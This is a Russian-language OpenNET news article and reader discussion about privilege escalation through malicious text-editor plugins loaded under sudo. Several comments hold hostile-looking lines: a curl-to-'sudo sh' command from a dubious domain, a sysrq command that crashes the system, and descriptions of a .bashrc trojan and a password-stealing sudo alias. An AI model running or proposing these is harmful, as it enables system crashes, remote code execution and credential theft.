The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Оценка влияния на безопасность плагинов к текстовым редакторам

20.03.2018 20:42

Исследователи из компании SafeBreach представили спорный метод атаки, позволяющий атакующему поднять привилегии в системе, в случае если он получил возможность изменения файлов в каталоге пользователя, имеющего право на выполнение привилегированных операций через sudo. Метод атаки основан на том, что текстовые редакторы автоматически подключают плагины, не только централизованно установленные в системе, но и те, что размещены в домашнем каталоге пользователя.

Проанализировав обработку плагинов в Vim, Emacs, Sublime, Gedit и pico/nano, исследователи пришли к выводу, что все они могут быть использованы для атаки. Суть атаки сводится к размещению в каталоге пользователя, имеющего право на выполнение привилегированных операций через sudo, вредоносного плагина (например, в ~/.vim/plugin/, ~/.config/sublime-text-3/Packages/User, ~/.emacs.d/init.el или ~/.local/share/gedit/plugins), который будет выполнен, когда текстовый редактор будет запущен с повышенными привилегиями при помощи утилиты sudo (например, "sudo vim"). Для блокирования проблемы исследователи рекомендуют раздельно обрабатывать запуск с повышенными привилегиями и не загружать плагины, которые принадлежат непривилегированному пользователю, не совпадающему с владельцем текущего процесса.

Разработчики vim, emacs и gedit не стали рассматривать указанное поведение как уязвимость, так как если атакующий уже смог загрузить свой файл в каталог пользователя, имеющего возможность выполнить sudo, то атака может считаться успешно совершённой и усложнения с запуском текстовых редакторов для повышения привилегий излишни. Кроме того, проблема с плагинами возникает из-за некорректной конфигурации sudo, не меняющего переменную $HOME после смены пользователя.

  1. Главная ссылка к новости (https://safebreach.com/Post/Ab...)
  2. OpenNews: Критическая проблема в NPM 5.7, приводящая к смене прав доступа на системные каталоги
  3. OpenNews: В Tor Browser устранена уязвимость, допускавшая прямое соединение в обход Tor
  4. OpenNews: В sudo устранена уязвимость, позволяющая переписать файл на системах с SELinux
  5. OpenNews: Серия уязвимостей в Firejail
  6. OpenNews: Критическая уязвимость в ядре Linux, уже эксплуатируемая злоумышленниками
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/48299-sudo
Ключевые слова: sudo, editor, plugin
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (56) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Anonim (??), 21:20, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +26 +/
    Хакер и солонка
     
  • 1.2, ыы (?), 21:24, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –12 +/
    >если атакующий уже смог загрузить свой файл в каталог пользователя, имеющего возможность выполнить sudo, то атака уже может считаться успешно совершённой

    странная логика у товарищей.

     
     
  • 2.5, Аноним (-), 22:41, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Совершенно нормальная.
     
  • 2.16, Аноним (-), 04:53, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Тогда разреши по SSH приконнектиться?
     

  • 1.3, я (?), 21:44, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Дополнения дают неограниченный доступ к компу жертвы. Sublime-text или Atom тащит дополнения в каждом из которых может быть зловред. А даже если сейчас нет, то произойдет то же, что и с Chrome - кто-то интегрирует зловред в обычный плагин и получит неограниченный доступ к компу.
     
     
  • 2.7, Аноним (-), 22:44, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    А ты не используй неведомое нечто, а используй редактор.
     
     
  • 3.58, Аноним (-), 20:01, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Штука в том, что почти все редакторы, используемые в программировании, так или иначе расчитаны на работу с плагинами и без них практически бесполезны.
     
  • 3.63, IRASoldier (?), 15:55, 22/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Sublime Text - это редактор. "A sophisticated text editor for code, markup and prose".
     
  • 2.46, Аноним (-), 14:37, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Но в больших масштабах оно работать не будет, потому что расширения лежат в сторе, где их можно всегда проверить и откуда их можно удалить. А вот что делать с расширениями, которые подкладываются в userspace и выполняются редакторами без ведома пользователя - вот это не ясно.
     

  • 1.4, я (?), 21:47, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Разрабы популярных редакторов игнорируют проблемы пользователей. Там нет ни песочницы, ни проверки дополнений - ничего. Дескать открытый код решает все проблемы. Но как мы видели на примере Хрома, он ничего не решает.
     
     
  • 2.6, Аноним (-), 22:43, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Там нет ни песочницы, ни проверки дополнений - ничего. Дескать открытый код решает все проблемы.
    > Но как мы видели на примере Хрома, он ничего не решает.

    Как мы видели на примере хрома, песочница и проверка дополнений и подавно ничего не решают.

     
     
  • 3.37, Аноним (-), 11:54, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –6 +/
    Проблему решает только AppStore с тотальной премодерацией абсолютно всего. Это единственный путь, опенсорс уже давно доказал свою несостоятельность.
     
     
  • 4.54, Iaaa (ok), 17:49, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Лично я через апстор спокойно проводил сбор сетевой статистики.

    Всего то надо было ее на неделю отключить, что бы проверяющий индус ничего не успел увидеть.

     
  • 2.10, Аноним (-), 23:28, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +9 +/
    Открытый код не решает проблемы отсутствия мозгов у пользователей.
     
  • 2.12, Crazy Alex (ok), 23:33, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Зато ниличие мозга проблемы вполне решает. Если вы, конечно, не джаваскриптер с лефтпадом, который тащит в рот всё подряд не глядя.
     
     
  • 3.38, Аноним (-), 11:58, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –5 +/
    Просто ты со своей сишечкой устарел и у тебя бомбит от модных-молодежных хипстеров на js, за которыми будущее - а ты перед этим бессилен.
     
     
  • 4.39, Crazy Alex (ok), 12:07, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Расслабься, мне это первый раз сказали те, кто писал, кажется, на FoxPro. А потом - дельфишники, рельсовики... И этих переживу.
     
     
  • 5.48, Аноним (-), 15:49, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    :)
     
  • 5.50, _ (??), 16:05, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Расслабься, мне это первый раз сказали те, кто писал, кажется, на FoxPro.
    >А потом - дельфишники, рельсовики... И этих переживу.
    >Crazy Alex

    Ай крассава! В форсунки! (С) :-)

      

     
     
  • 6.62, Аноним (-), 15:06, 22/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Так что все, ты проиграл эту эволюцию, проследуй за лисперами и кобольщиками.

    Но пока не переписали еще и оставшуюся, совершенно незначительную часть прослойки между JS и пользователем (браузеры, графические стеки, дрова и ядра там всякие) на JS, старперы еще немного потрепыхаются.


     

  • 1.8, Аноним (-), 23:06, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +8 +/
    обнаружена уязвимость в пайпе баша, при помощи которой можно выполнить абсолютно любой код. Демонстрация уязвимости:

    echo "echo hacked" > exploit.txt
    bash exploit.txt

     
     
  • 2.13, vantoo (ok), 23:50, 20/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > bash exploit.txt

    sudo bash exploit.txt
    /FIXED

     
     
  • 3.20, ryoken (ok), 08:30, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > sudo bash exploit.txt
    > /FIXED

    навеяло... "КАПИТАН Джек Воробей" :D

     
  • 3.43, Аноним (-), 13:48, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > sudo bash exploit.txt

    $ sudo bash exploit.txt
    [sudo] password for root: root
    /FIXED

     
  • 2.22, Харитон (?), 09:20, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А где собственно пайп?)))
     
     
  • 3.36, PnDx (ok), 11:45, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Вот так устроит?
    echo c | sudo tee /proc/sysrq-trigger
     

  • 1.9, Аноним (-), 23:23, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Так vim, например, с-под sudo (без -E опции) не подгружает пользовательские настройки и плагины. А зачем последние нужны под рутом я не представляю.
     
     
  • 2.25, Аноним (-), 09:30, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    На бубунте подгружает.
     
     
  • 3.41, alltiptop (ok), 13:25, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Всё у этих ни как у людей
     
  • 3.51, Аноним (-), 16:36, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > На бубунте подгружает.

    Ты про vim под sudo (и зачем бы его так запускать?) или про sudoedit (который вовсе не под рутом редактор запускает)?

     

  • 1.11, Аноним (-), 23:32, 20/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Исследователи говорят нам, мол, если вы поставите зловредный плагин, то вы в опасности. Спасибо, а то мы не знали.
     
     
  • 2.26, Andrey Mitrofanov (?), 09:32, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Исследователи говорят нам, мол, если вы поставите зловредный плагин, то вы в
    > опасности. Спасибо, а то мы не знали.

    Исследователи откровенно стебутся над пользователями [дистрибутивов] с открытым беспарольныс sudo на *.*

    Уязвимость - в редакторе.  Деньги - в бидоне.  Смекаешь?

     
     
  • 3.53, Аноним (-), 17:16, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Исследователи откровенно стебутся над пользователями [дистрибутивов] с открытым беспарольныс sudo на *.*

    Хороший стёб. Но я обычно стебусь ещё над пользователями sudo.

     
     
  • 4.57, Аноним (-), 19:45, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Не смог в документацию?
     

  • 1.14, Аноним (-), 00:56, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    До 1 апреля еще 10 дней, невтерпеж им
     
  • 1.15, Аноним (-), 01:08, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    > Для блокирования проблемы исследователи рекомендуют

    не (мучать) мозг, а вместо суды использовать су.

    /thread

     
     
  • 2.17, ERTre (?), 04:56, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Не пугай так убунтят, их нынче много развелось.
     
  • 2.27, Andrey Mitrofanov (?), 09:37, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    >> Для блокирования проблемы исследователи рекомендуют
    > не (мучать) мозг, а вместо суды использовать су.
    > /thread

    Прааальна!

    А sudoers с ALL=(ALL) NOPASSWD:ALL оставить тем, кто им _умеет пользоваться -- кракирам, "исследователям" безопасности и примкнувшим к ним дистрибутивам.

     

  • 1.18, Тот_Самый_Анонимус (?), 07:00, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Плагинам не место в каталоге пользователя. Это как в винде программы у пользователей с пониженными правами программы могут устанавливаться в каталог пользователя, так и в линухе с плагинами. И то и другое — дыра в безопасности. Второе даже хуже: его не всегда запретишь средствами ОС.
     
     
  • 2.19, Аноним (-), 07:45, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Так не ставь их в каталог пользователя.
     
  • 2.32, KonstantinB (ok), 11:05, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    В виме никто не мешает настроить runtimepath.
    В емаксе никто не мешает настроить load-path.
     

  • 1.21, John (??), 08:32, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Никогда не понимал одминов, которые разрешают sudo без пароля...
     
     
  • 2.23, Аноним (-), 09:27, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    при чем здесь это?
    команду sudo исполняет не редактор, а пользователь при запуске редактора. Даже при наличии пароля пользователь его введет, т.к. ему нужно что-либо отредактировать, и редактор запустится с root-правами.
     

  • 1.29, Аноним (-), 10:03, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "Оценка влияния на безопасность плагинов к текстовым редакторам". А теперь тоже самое, но по-русски.
     
     
  • 2.31, Аноним (-), 10:36, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Наверное, следовало бы написать "Оценка влияния на безопасность текстовых редакторов плагинов к ним".
     
  • 2.35, Andrey Mitrofanov (?), 11:36, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > "Оценка влияния на безопасность плагинов к текстовым редакторам". А теперь тоже самое,
    > но по-русски.

    " бизапаснасть! шекели, шекели!! многа шекелей!!! а вот каму бизапаснасть71 "

     

  • 1.30, Аноним (-), 10:33, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Убунтологи, бойтесь, это, в первую очередь, касается вас! У вас же всё через sudo. Например, гентушники предпочитают su или, если на локальной консоли, то напрямую залогиниться рутом для выполнения админский действий.
     
  • 1.34, Аноним (-), 11:33, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    а зачем вообще запускать эти редакторы из-под sudo? Если надо поправить какой-нибудь системный конфиг, то для этого есть nano.
     
     
  • 2.40, Crazy Alex (ok), 12:10, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    nano есть ровно для того, чтобы дожить до момента установки vim или хотя бы mc.
     
  • 2.45, Аноним (-), 14:12, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Для этого есть sudoedit, вообще-то. Который запускает редактор из-под пользователя, а не из-под root.
     

  • 1.42, Аноним (-), 13:26, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Использование visudo разве не спасает от такого?
     
  • 1.44, Аноним (-), 14:06, 21/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А зачем обязательно скрипты редакторов использовать? Может лучше сразу записать запуск трояна в .bashrc ?

    Как вариант, троян форкается в background, ждёт запуска sudo и сам "переходит на следующий уровень" привелегий. Например, используя таймаут, пока не надо перевводить пароль при повторном запуске sudo.

     
     
  • 2.47, Аноним (-), 15:25, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Или можно сделать bash alias для sudo, чтоб вызывался свой sudo, который и какой нужно код запустит, и пароль заботливо сохранит, а может и сообщит его "куда следует".
     
  • 2.49, Аноним (-), 15:56, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Может лучше сразу записать запуск трояна в .bashrc ?

    Расслабься. Большинству достаточно написать, что для установки какой-нибудь софтины нужно сделать

    curl https://aninnovativestartupdomainregisteredaweekago.com/installer-master.sh | sudo sh

    и никакого вмешательства в .bashrc не потребуется.

     
     
  • 3.52, Аноним (-), 16:44, 21/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Дык пацаны же сказали что троян надо обязательно в плагины к редактору вписывать
     
  • 2.59, Аноним (-), 05:45, 22/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А зачем вообще трояну рут? Он уже получил всё ценное.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру